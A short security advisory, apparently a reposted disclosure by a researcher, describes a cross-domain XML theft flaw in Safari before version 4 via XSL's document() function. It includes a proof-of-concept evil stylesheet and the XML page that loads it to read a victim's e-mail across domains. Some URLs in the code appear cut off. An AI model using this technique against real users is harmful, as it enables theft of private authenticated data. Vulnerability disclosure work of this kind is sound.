11.54.56 Apple Safari cross-domain XML theft vulnerability | |
Safari prior to version 4 may permit an evil web page to steal arbitrary XML data cross-domain. This is accomplished by abusing a relatively obscure cross-domain access point which was completely missing a cross-domain access check. The access point in question is the document() function in XSL. This is best illustrated with a sample evil XSL file which abuses this function: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/ xmlns:str="http://exslt.org/ <xsl:template match="*"> <html> <body> Below, you should see e-mail stolen cross-domain! <p/> <xsl:value-of select="document('https:// <script> alert(document.body.innerHTML) </script> </body> </html> </xsl:template> </xsl:stylesheet> To mount the attack, the attacker would serve a web page which has XML MIME type and requests to be styled by the evil stylesheet: <?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"? <xml> irrelevant </xml> There are a number of interesting XML-based formats you might want to steal including authenticated RSS, XML-formatted AJAX-y responses, and XHTML. Full technical details: http://scary.beasts.org/ Blog post: http://scarybeastsecurity. (includes 1-click demo) Cheers Chris | |
|
Total comments: 0 | |